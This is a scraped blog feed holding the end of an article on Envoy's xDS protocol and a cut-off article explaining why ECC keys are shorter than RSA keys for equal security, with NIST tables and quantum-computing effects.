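&lt;p&gt;Concretely, opting into ADS is a bootstrap-level setting in Envoy. The fragment below is a minimal sketch of that bootstrap; the &lt;code&gt;xds_cluster&lt;/code&gt; name is an assumption and must match a static cluster in the same bootstrap that points at your control plane:&lt;/p&gt;

```yaml
dynamic_resources:
  ads_config:
    api_type: GRPC
    transport_api_version: V3
    grpc_services:
      - envoy_grpc:
          cluster_name: xds_cluster   # static cluster pointing at the control plane
  lds_config:
    ads: {}   # listeners arrive over the shared ADS stream
  cds_config:
    ads: {}   # clusters too: one stream, one ordering
```

&lt;p&gt;With &lt;code&gt;ads: {}&lt;/code&gt; set on every resource type, the control plane alone decides the delivery order.&lt;/p&gt;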




&lt;h2&gt;
  
  
  5. SotW vs Delta: Taming the Infinite Endpoint Explosion
&lt;/h2&gt;

&lt;p&gt;Looking back at the history of xDS brings us to another massive evolutionary fork: &lt;em&gt;how&lt;/em&gt; the configs are sent.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Limits of State of the World (SotW)
&lt;/h3&gt;

&lt;p&gt;Early xDS utilized a model called &lt;strong&gt;SotW (State of the World)&lt;/strong&gt;. When Envoy asks "Tell me the current endpoints," the server responds by sending back &lt;strong&gt;"the entire, exhaustive list of endpoints"&lt;/strong&gt; every single time.&lt;/p&gt;

&lt;p&gt;Let's assume you have a cluster of 1,000 Pods, and a single Pod scales out, making it 1,001.&lt;br&gt;
In the SotW model, &lt;code&gt;istiod&lt;/code&gt; beams out the &lt;strong&gt;full list of 1,001 IP addresses&lt;/strong&gt; to every single Envoy proxy. The 1,000 unmodified records are re-transmitted entirely. This is a colossal waste of network bandwidth and CPU horsepower. Once your cluster scales large enough, the control plane grinds to a halt.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Dawn of Incremental (Delta) xDS
&lt;/h3&gt;

&lt;p&gt;This crisis birthed &lt;strong&gt;Delta xDS&lt;/strong&gt;.&lt;br&gt;
When responding to subscription requests, the server now sends &lt;strong&gt;"only the diff from the last state (added IPs, removed IPs)."&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;SotW: &lt;code&gt;[IP_A, IP_B, IP_C]&lt;/code&gt; (If B is deleted, it resends &lt;code&gt;[IP_A, IP_C]&lt;/code&gt;. Items missing from the list are implicitly assumed deleted.)&lt;/li&gt;
&lt;li&gt;Delta: &lt;code&gt;removed_resources: ["IP_B"]&lt;/code&gt; (Explicitly sends ONLY the deletion directive.)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Because the server must maintain an in-memory cache tracking the individual state of every single client, the backend implementation becomes drastically more complex. However, the performance gains are monumental. Modern service meshes circa 2026 (including recent versions of Istio) support Delta xDS and are increasingly adopting it as the default.&lt;/p&gt;
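
&lt;p&gt;The bandwidth difference is easy to see in a toy model. This Python sketch (the endpoint addresses are made up for illustration) contrasts what each mode puts on the wire when one Pod is added to a 1,000-Pod cluster:&lt;/p&gt;

```python
# Toy model of SotW vs Delta xDS payloads. Endpoint addresses are made up.

def sotw_update(current):
    # State of the World: the full endpoint list, every time.
    return set(current)

def delta_update(previous, current):
    # Incremental: only additions and explicit removals cross the wire.
    return {"added": current - previous, "removed_resources": previous - current}

pods_before = {f"10.0.{i // 256}.{i % 256}" for i in range(1000)}  # 1,000 Pods
pods_after = pods_before | {"10.0.4.0"}                            # one Pod scales out

full = sotw_update(pods_after)
diff = delta_update(pods_before, pods_after)
print(len(full), len(diff["added"]), len(diff["removed_resources"]))  # 1001 1 0
```

&lt;p&gt;The SotW payload re-ships all 1,001 records; the Delta payload carries exactly one addition and an empty &lt;code&gt;removed_resources&lt;/code&gt; list.&lt;/p&gt;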




&lt;h2&gt;
  
  
  6. Beyond Routing: Advanced xDS Use Cases
&lt;/h2&gt;

&lt;p&gt;When discussing xDS, it's impossible to ignore the fact that &lt;strong&gt;xDS is no longer an "Envoy-exclusive routing protocol."&lt;/strong&gt; As of 2026, the xDS ecosystem has expanded well beyond basic routing and into non-Envoy clients.&lt;/p&gt;

&lt;h3&gt;
  
  
  6.1 Dynamic Injection of Extensions (ECDS)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;ECDS (Extension Config Discovery Service)&lt;/strong&gt; is a mechanism to dynamically push "extension filters" (like WebAssembly) directly into Envoy.&lt;br&gt;
For example, you write a proprietary Wasm module that applies custom obfuscation to a specific HTTP header, and you stream it via ECDS. This lets you &lt;strong&gt;hot-reload and inject brand-new Wasm modules into every proxy safely, while they are running&lt;/strong&gt;, without touching LDS or RDS at all.&lt;/p&gt;

&lt;h3&gt;
  
  
  6.2 Streaming Runtime Variables (RTDS)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;RTDS (Runtime Discovery Service)&lt;/strong&gt; skips routing altogether and instead streams "runtime variables" (think of it as a virtual file system).&lt;br&gt;
Need to flip a new feature ON/OFF (feature toggles) or temporarily throttle a specific user's rate limits? You use RTDS. It instantly propagates single variable tweaks to thousands of proxies without forcing an application rebuild or redeploy.&lt;/p&gt;
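
&lt;p&gt;In Envoy's bootstrap this shows up as a runtime layer. A minimal sketch; the layer and resource names here (&lt;code&gt;my_runtime&lt;/code&gt;, &lt;code&gt;my_feature.enabled&lt;/code&gt;) are placeholders, not a fixed convention:&lt;/p&gt;

```yaml
layered_runtime:
  layers:
    - name: static_defaults
      static_layer:
        my_feature.enabled: false   # baseline value baked into the bootstrap
    - name: rtds
      rtds_layer:
        name: my_runtime            # resource name requested from the RTDS server
        rtds_config:
          ads: {}                   # stream runtime updates over the ADS stream
```

&lt;p&gt;Later layers override earlier ones, so a single RTDS push flips &lt;code&gt;my_feature.enabled&lt;/code&gt; fleet-wide without a redeploy.&lt;/p&gt;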

&lt;h3&gt;
  
  
  6.3 Building Proprietary Control Planes (&lt;code&gt;go-control-plane&lt;/code&gt;) &amp;amp; Case Studies
&lt;/h3&gt;

&lt;p&gt;Because the xDS specs are fully open (defined in Protobuf), it's highly common for massive-scale environments to ditch off-the-shelf products like Istio and &lt;strong&gt;build their very own bespoke xDS control planes&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Libraries provided by the Envoy project, like &lt;code&gt;go-control-plane&lt;/code&gt;, shoulder the agonizing implementation burdens of operating an xDS gRPC server (handling streams, snapshot caching, etc.). By wiring this up, companies can construct proprietary control planes that use "internal corporate databases" as the Source of Truth, governed by heavily customized business logic.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Tech Giant Case Studies:&lt;/strong&gt;&lt;br&gt;
For companies wrestling with horribly complex "brownfield" infrastructure, these custom control planes are a lifeline.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Stripe&lt;/strong&gt;: They operate an internal service mesh using HashiCorp Consul as the Source of Truth for service discovery. They built a custom control plane that snags data from Consul, compiles it into xDS parameters, and streams it to Envoy.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Netflix&lt;/strong&gt;: To manage their astronomical fleet of microservices, Netflix built a custom foundation fused with Eureka (their service registry). By aggressively utilizing &lt;code&gt;On-Demand Cluster Discovery (ODCDS)&lt;/code&gt;, they dynamically inject &lt;em&gt;only&lt;/em&gt; the settings Envoy actually needs, shattering the scaling boundaries of giant clusters.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Airbnb / Uber&lt;/strong&gt;: They bake custom logic into their bespoke control planes to rein in legacy, non-containerized workloads that refuse to submit to Kubernetes, and to shove highly specialized, company-specific L7 routing logic straight into the proxy tier.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The meta isn't just "deploy Istio and call it a day." It’s "translate your company's proprietary domain logic into xDS, the universal language, and stream it." That is the absolute frontline of the service mesh today.&lt;/p&gt;

&lt;h3&gt;
  
  
  6.4 The "Proxyless gRPC" Paradigm
&lt;/h3&gt;

&lt;p&gt;The ultimate evolution of this is &lt;strong&gt;Proxyless gRPC&lt;/strong&gt;.&lt;br&gt;
Instead of deploying an Envoy (sidecar) next to your application, &lt;strong&gt;the gRPC library itself seamlessly acts as an xDS client&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd9b8vdm7x1jl9e8shtpx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd9b8vdm7x1jl9e8shtpx.png" alt="Proxyless gRPC" width="621" height="589"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;By generating a gRPC channel using the unique &lt;code&gt;xds:///my-service&lt;/code&gt; URI scheme, the gRPC library quietly connects to the control plane (like &lt;code&gt;istiod&lt;/code&gt;) under the hood, pulls down EDS configs, and blasts direct HTTP/2 requests right to the optimal Pod from &lt;em&gt;within your own application process&lt;/em&gt;.&lt;br&gt;
Because you bypass the sidecar entirely, you remove a network hop, cutting both latency and CPU usage. &lt;em&gt;This&lt;/em&gt; is the true essence of xDS earning the title "Universal Data Plane API".&lt;/p&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Behind the magic of an infrastructure that swaps over seconds after you run &lt;code&gt;kubectl apply&lt;/code&gt; lies this gritty, battle-tested machinery.&lt;/p&gt;

&lt;p&gt;The rigid hierarchy of LDS/RDS/CDS/EDS enforcing dependencies.&lt;br&gt;
The robust ACK/NACK flow shielding the system from broken configurations.&lt;br&gt;
The sequencing and stream multiplexing of ADS preventing 503 spikes.&lt;br&gt;
And the adoption of Delta xDS breaking through the limits of scalability.&lt;/p&gt;

&lt;p&gt;It is precisely because these gears mesh in such miraculous balance that we get to casually enjoy things like "zero downtime traffic shifting" and "canary releases."&lt;br&gt;
xDS is no longer just Envoy's internal protocol. It is the absolute, most vital "nervous system" anchoring modern, cloud-native network architecture.&lt;/p&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.envoyproxy.io/docs/envoy/latest/api-docs/xds_protocol" rel="noopener noreferrer"&gt;Envoy xDS REST and gRPC Protocol (Official Documentation)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.envoyproxy.io/docs/envoy/latest/api/api" rel="noopener noreferrer"&gt;xDS API Overview - Envoy&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/cncf/xds" rel="noopener noreferrer"&gt;CNCF xDS API Repository&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://grpc.io/docs/guides/xds/" rel="noopener noreferrer"&gt;gRPC Proxyless Service Mesh&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>envoy</category>
      <category>servicemesh</category>
      <category>kubernetes</category>
      <category>istio</category>
    </item>
    <item>
      <title>Why Can We Use "Shorter" Keys?: Key Length vs Security Bits, the Real Story</title>
      <dc:creator>kt</dc:creator>
      <pubDate>Sun, 19 Apr 2026 15:50:50 +0000</pubDate>
      <link>https://dev.to/kanywst/why-can-we-use-shorter-keys-key-length-vs-security-bits-the-real-story-1gl3</link>
      <guid>https://dev.to/kanywst/why-can-we-use-shorter-keys-key-length-vs-security-bits-the-real-story-1gl3</guid>
      <description>&lt;p&gt;"ECDSA P-256 has shorter keys than RSA-2048. So it must be weaker."&lt;/p&gt;

&lt;p&gt;...I used to think that too.&lt;/p&gt;

&lt;p&gt;2048 bits vs 256 bits. Just looking at the numbers, RSA seems 8x "stronger." But NIST (the National Institute of Standards and Technology) treats these two as &lt;strong&gt;equal in security strength&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;On top of that, RSA-2048's actual security does not even reach "128-bit security." It sits at &lt;strong&gt;112 bits&lt;/strong&gt;, and it is getting deprecated in 2030. Meanwhile, P-256 properly achieves 128-bit security.&lt;/p&gt;

&lt;p&gt;So &lt;strong&gt;the shorter key is actually stronger&lt;/strong&gt;. The concept behind this counterintuitive fact is called "security bits."&lt;/p&gt;

&lt;p&gt;This article covers why "key length" and "actual security" do not match up, from the mathematical foundations all the way to the 2026 transition timeline.&lt;/p&gt;




&lt;h2&gt;
  
  
  1. Background: Symmetric vs Public Key Cryptography
&lt;/h2&gt;

&lt;p&gt;There are two fundamental types of cryptography. Without understanding this distinction, key length discussions will never make sense.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Symmetric Key Cryptography&lt;/strong&gt;: Uses &lt;strong&gt;the same key&lt;/strong&gt; for both encryption and decryption. The canonical example is &lt;strong&gt;AES&lt;/strong&gt; (Advanced Encryption Standard). Both sender and receiver need to share the same key. It is fast, and it is what actually encrypts your data. WiFi (WPA2/3) and disk encryption (BitLocker, FileVault) all use this.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Public Key Cryptography&lt;/strong&gt;: Uses &lt;strong&gt;a pair of different keys&lt;/strong&gt; for encryption and decryption. The main examples are &lt;strong&gt;RSA&lt;/strong&gt; and &lt;strong&gt;ECC&lt;/strong&gt; (Elliptic Curve Cryptography). You can hand out the public key to anyone, but only the corresponding private key can decrypt. Key distribution is easy, so it is used for TLS (HTTPS) key exchange and digital signatures. The downside is that it is computationally expensive.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvj4tabmdpqzkoh8j5x6f.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvj4tabmdpqzkoh8j5x6f.png" alt="key" width="800" height="257"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In practice, HTTPS combines both. Public key crypto handles "securely exchanging a key," then symmetric crypto handles "encrypting data fast."&lt;/p&gt;
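
&lt;p&gt;Here is a deliberately toy Python sketch of that division of labor: a textbook Diffie-Hellman exchange (over the Mersenne prime $2^{127}-1$, far too small for real use) stands in for the public-key step, and a hash-derived XOR keystream stands in for AES. Do not use this for anything real; it only shows the shape of the handshake.&lt;/p&gt;

```python
import hashlib
import secrets

# Toy parameters: a small public prime and generator. Real TLS uses X25519/ECDH.
p = 2**127 - 1   # a Mersenne prime; FAR too small for actual security
g = 3

# --- Public-key step: agree on a secret over an open channel ---
a = secrets.randbelow(p - 2) + 2   # Alice's private exponent
b = secrets.randbelow(p - 2) + 2   # Bob's private exponent
A = pow(g, a, p)                   # Alice's public value (sent in the clear)
B = pow(g, b, p)                   # Bob's public value (sent in the clear)

# Both sides compute the same shared secret and hash it into a symmetric key.
key_alice = hashlib.sha256(pow(B, a, p).to_bytes(16, "big")).digest()
key_bob = hashlib.sha256(pow(A, b, p).to_bytes(16, "big")).digest()
assert key_alice == key_bob

# --- Symmetric step: the fast shared key encrypts the bulk data ---
# (XOR with the key bytes stands in for AES here.)
msg = b"hello"
ct = bytes(m ^ k for m, k in zip(msg, key_alice))
pt = bytes(c ^ k for c, k in zip(ct, key_bob))
assert pt == msg
```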

&lt;p&gt;Now here is the thing. &lt;strong&gt;These two types of cryptography require completely different key lengths.&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  2. "Key Length" and "Security Bits" Are Different Things
&lt;/h2&gt;

&lt;p&gt;Let me clarify the terminology.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Key Length&lt;/strong&gt;: The number of bits in the key data that the algorithm uses. RSA-2048 uses 2048 bits, AES-128 uses 128 bits.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Security Bits (Security Strength)&lt;/strong&gt;: The computational effort required to break the cipher, expressed as a power of 2.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;"128-bit security" means that even the best known attack requires roughly $2^{128}$ operations. $2^{128}$ is about 3.4 x $10^{38}$. Even if you threw every supercomputer on Earth at it, you could repeat the entire age of the universe (about 13.8 billion years) trillions of times over and still not finish. It is basically the threshold for "cannot be broken in practice."&lt;/p&gt;

&lt;p&gt;Here is the biggest source of confusion: &lt;strong&gt;key length ≠ security bits&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;AES-128 has 128-bit security. Key length and security bits happen to match.&lt;br&gt;
But RSA-2048 only has 112-bit security. Despite having a 2048-bit key, its effective strength is only 112 bits.&lt;/p&gt;

&lt;p&gt;Why does this happen?&lt;/p&gt;


&lt;h2&gt;
  
  
  3. Each Cipher Has Different Attack "Shortcuts"
&lt;/h2&gt;

&lt;p&gt;Breaking a cipher is not just about trying every possible key (brute force). Some algorithms have much more efficient attack methods. The existence and efficiency of these "shortcuts" determine the key length each algorithm needs.&lt;/p&gt;
&lt;h3&gt;
  
  
  AES: No shortcuts, so key length = security bits
&lt;/h3&gt;

&lt;p&gt;The best known attack against AES is essentially brute force. For AES-128, you need to try all $2^{128}$ possible keys. That is why key length directly equals security bits.&lt;/p&gt;
&lt;h3&gt;
  
  
  RSA: Integer factorization is a powerful shortcut
&lt;/h3&gt;

&lt;p&gt;RSA's security relies on the assumption that "factoring a huge number $N$ is hard."&lt;/p&gt;

&lt;p&gt;$N$ is the product of two large primes $p$ and $q$ ($N = p \times q$). If you can find $p$ and $q$, you can compute the private key, but if $N$ is large enough, factoring should take an impractical amount of time... or so the idea goes.&lt;/p&gt;

&lt;p&gt;The problem is that there exists an efficient algorithm for integer factorization called the &lt;strong&gt;General Number Field Sieve (GNFS)&lt;/strong&gt;. Thanks to GNFS, the effort to break RSA-2048 drops from an astronomically large naive search down to roughly $2^{112}$ operations.&lt;/p&gt;

&lt;p&gt;Think of it this way. Trying every combination on a 2048-bit safe one by one would take an astronomical amount of time. But GNFS is like "analyzing the safe's internal structure to dramatically narrow down the combinations." The key is 2048 bits, but the effective defense is only 112 bits.&lt;/p&gt;
&lt;h3&gt;
  
  
  ECC: Has shortcuts, but they are far less efficient than RSA's
&lt;/h3&gt;

&lt;p&gt;ECC (Elliptic Curve Cryptography) relies on the "Elliptic Curve Discrete Logarithm Problem (ECDLP)."&lt;/p&gt;

&lt;p&gt;I will skip the detailed math, but the key point is this: the best attack against ECC (Pollard's rho) requires on the order of $2^{n/2}$ operations for an $n$-bit key, an exponent of &lt;strong&gt;half the key length&lt;/strong&gt;. For P-256 (256-bit key), that means $2^{128}$ operations, which gives you 128-bit security.&lt;/p&gt;

&lt;p&gt;Digging a bit deeper, this difference comes from a &lt;strong&gt;gap in computational complexity&lt;/strong&gt;. GNFS runs in &lt;strong&gt;sub-exponential time&lt;/strong&gt;, meaning that even as you make keys longer, the attack cost grows sluggishly. Pollard's rho against ECC, on the other hand, runs in &lt;strong&gt;exponential time&lt;/strong&gt;, specifically $O(\sqrt{N})$ where $N$ is the group order. Every two extra bits in the key double the attack cost.&lt;/p&gt;

&lt;p&gt;In concrete numbers: RSA-2048 goes from 2048 bits to 112-bit security (roughly 1/18), RSA-3072 goes from 3072 bits to 128 bits (roughly 1/24), and RSA-15360 goes from 15360 bits to 256 bits (roughly 1/60). The longer the key, the worse the "decay ratio" gets. This is a direct consequence of GNFS being sub-exponential: the growth in attack cost cannot keep up with the cost of making keys longer. ECC stays at 1/2 regardless. This mathematical gap is what makes "ECC is secure with short keys" possible.&lt;/p&gt;
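
&lt;p&gt;You can reproduce these ballpark figures from the GNFS running time itself. The sketch below uses the asymptotic $L_N[1/3, (64/9)^{1/3}]$ formula with the $o(1)$ term and all constant factors dropped, so it lands near, but not exactly on, NIST's conservative 112/128/256 assignments:&lt;/p&gt;

```python
import math

def gnfs_bits(n_bits):
    """Rough GNFS attack cost (in bits) for an n_bits RSA modulus.

    Asymptotic estimate exp(((64/9)^(1/3)) * (ln N)^(1/3) * (ln ln N)^(2/3)),
    ignoring lower-order terms, so expect values near NIST's figures, not equal.
    """
    ln_n = n_bits * math.log(2)
    cost = math.exp((64 / 9) ** (1 / 3) * ln_n ** (1 / 3) * math.log(ln_n) ** (2 / 3))
    return math.log2(cost)

def rho_bits(n_bits):
    """Pollard's rho against an n_bits curve: about 2^(n/2) group operations."""
    return n_bits / 2

for rsa in (2048, 3072, 15360):
    bits = gnfs_bits(rsa)
    print(f"RSA-{rsa}: ~{bits:.0f} security bits (ratio {bits / rsa:.3f})")
print(f"P-256: ~{rho_bits(256):.0f} security bits (ratio 0.500)")
```

&lt;p&gt;The shrinking ratio as RSA keys grow, versus ECC's constant 1/2, is the sub-exponential vs exponential gap made visible.&lt;/p&gt;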

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F17ll5sofprbttek34fhz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F17ll5sofprbttek34fhz.png" alt="ecc vs rsa" width="715" height="355"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;RSA has the longer key but the lower security bits. That is how big the difference in attack efficiency is.&lt;/p&gt;


&lt;h2&gt;
  
  
  4. Equivalent Security Key Lengths (NIST SP 800-57)
&lt;/h2&gt;

&lt;p&gt;So how do these differences in attack efficiency translate to actual key lengths? NIST SP 800-57 Part 1 defines a security strength equivalence table, and it is the industry standard as of 2026.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Security&lt;br&gt;Bits&lt;/th&gt;
&lt;th&gt;Symmetric&lt;br&gt;(AES)&lt;/th&gt;
&lt;th&gt;RSA&lt;br&gt;(Key)&lt;/th&gt;
&lt;th&gt;ECC&lt;br&gt;(Key)&lt;/th&gt;
&lt;th&gt;Hash&lt;br&gt;(SHA)&lt;/th&gt;
&lt;th&gt;Status&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;80&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;-&lt;/td&gt;
&lt;td&gt;1024&lt;/td&gt;
&lt;td&gt;160&lt;/td&gt;
&lt;td&gt;SHA-1&lt;/td&gt;
&lt;td&gt;❌ Prohibited&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;112&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;-&lt;/td&gt;
&lt;td&gt;2048&lt;/td&gt;
&lt;td&gt;224&lt;/td&gt;
&lt;td&gt;SHA-224&lt;/td&gt;
&lt;td&gt;⚠️ Deprecated by 2030&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;128&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;AES-128&lt;/td&gt;
&lt;td&gt;3072&lt;/td&gt;
&lt;td&gt;256&lt;/td&gt;
&lt;td&gt;SHA-256&lt;/td&gt;
&lt;td&gt;✅ Current minimum&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;192&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;AES-192&lt;/td&gt;
&lt;td&gt;7680&lt;/td&gt;
&lt;td&gt;384&lt;/td&gt;
&lt;td&gt;SHA-384&lt;/td&gt;
&lt;td&gt;✅ Recommended&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;256&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;AES-256&lt;/td&gt;
&lt;td&gt;15360&lt;/td&gt;
&lt;td&gt;512+&lt;/td&gt;
&lt;td&gt;SHA-512&lt;/td&gt;
&lt;td&gt;✅ Long-term protection&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Read this table horizontally. &lt;strong&gt;Every entry in the same row provides the same security.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Look at the 128-bit security row: AES needs 128 bits, ECC needs 256 bits, and RSA needs &lt;strong&gt;3072 bits&lt;/strong&gt;. RSA requires 12x the key length of ECC and 24x that of AES for the same security level. At 192-bit security, RSA-7680 is needed, and that causes serious performance issues in TLS handshakes.&lt;/p&gt;

&lt;p&gt;The most important row right now is 112 bits. That is where RSA-2048 lives. It does not meet the current minimum recommendation of 128-bit security.&lt;/p&gt;


&lt;h2&gt;
  
  
  5. RSA-2048 Gets Deprecated in 2030
&lt;/h2&gt;

&lt;p&gt;By now you know that RSA-2048 only provides 112-bit security. But it is not getting disabled overnight. NIST has defined a phased transition schedule.&lt;/p&gt;
&lt;h3&gt;
  
  
  NIST Transition Timeline
&lt;/h3&gt;

&lt;p&gt;NIST IR 8547 (published November 2024) lays out the concrete timeline.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkzl73okdt4wex1zbiq6a.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkzl73okdt4wex1zbiq6a.png" alt="timeline" width="654" height="293"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;When&lt;/th&gt;
&lt;th&gt;Status&lt;/th&gt;
&lt;th&gt;Scope&lt;/th&gt;
&lt;th&gt;What it means&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2030&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Deprecated&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;RSA-2048 and other ≤112-bit algorithms&lt;/td&gt;
&lt;td&gt;No new deployments. Existing systems need a migration plan.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2035&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Disallowed&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;RSA-3072/4096, P-256, P-384, and&lt;br&gt;&lt;strong&gt;all&lt;/strong&gt; quantum-vulnerable public key crypto&lt;/td&gt;
&lt;td&gt;Completely prohibited in FIPS-compliant systems.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Take a close look at the 2035 row. RSA-3072, P-256, P-384: algorithms that are currently "recommended" will all be prohibited. This is not about security bits. It is about quantum computers breaking the algorithms at a fundamental level. The next section explains why making keys longer will not help.&lt;/p&gt;
&lt;h3&gt;
  
  
  The Gap Between 112 and 128 Bits Is Not "Just 16"
&lt;/h3&gt;

&lt;p&gt;You might think "112 vs 128, that is only 16 apart." But in security bits, the difference is exponential.&lt;/p&gt;

&lt;p&gt;$2^{128} \div 2^{112} = 2^{16} = 65,536$&lt;/p&gt;

&lt;p&gt;An attacker capable of breaking 112-bit security would need &lt;strong&gt;65,536 times&lt;/strong&gt; more computation to break 128-bit security. Put another way, 112-bit security is only $\frac{1}{65536}$ as hard to break as 128-bit.&lt;/p&gt;

&lt;p&gt;RSA-2048 is not going to be cracked tomorrow, not in 2026. But computing power improves every year. If you are encrypting data today with RSA-2048 that would be damaging if decrypted in 10 or 20 years (medical records, intellectual property, diplomatic communications), it is time to start thinking about migration.&lt;/p&gt;


&lt;h2&gt;
  
  
  6. Quantum Computers: Why Longer Keys Will Not Save You
&lt;/h2&gt;

&lt;p&gt;In section 5, I wrote that RSA-3072 and P-384 will be prohibited by 2035. If longer keys mean more security bits, why ban them?&lt;/p&gt;

&lt;p&gt;The answer is quantum computers. Quantum computers affect cryptography in two ways, and they are fundamentally different from each other.&lt;/p&gt;
&lt;h3&gt;
  
  
  Shor's Algorithm: Breaks Public Key Crypto at the Root
&lt;/h3&gt;

&lt;p&gt;Shor's algorithm solves integer factorization and the discrete logarithm problem in &lt;strong&gt;polynomial time&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;For RSA, this means the assumption that "factoring $N$ is astronomically hard" simply collapses. The discrete logarithm problem behind ECC falls the same way. No matter how long you make the key, the fundamental assumption the algorithm relies on is gone. Upgrade to RSA-4096, RSA-15360, it makes no difference against Shor.&lt;/p&gt;

&lt;p&gt;This is why "all quantum-vulnerable public key crypto is prohibited by 2035." It is not a key length issue. You &lt;strong&gt;have to change the algorithm itself&lt;/strong&gt;.&lt;/p&gt;
&lt;h3&gt;
  
  
  Grover's Algorithm: Halves Symmetric Crypto Security
&lt;/h3&gt;

&lt;p&gt;Grover's algorithm speeds up brute-force search from $2^n$ to $\sqrt{2^n} = 2^{n/2}$.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Symmetric Cipher&lt;/th&gt;
&lt;th&gt;Classical Security&lt;/th&gt;
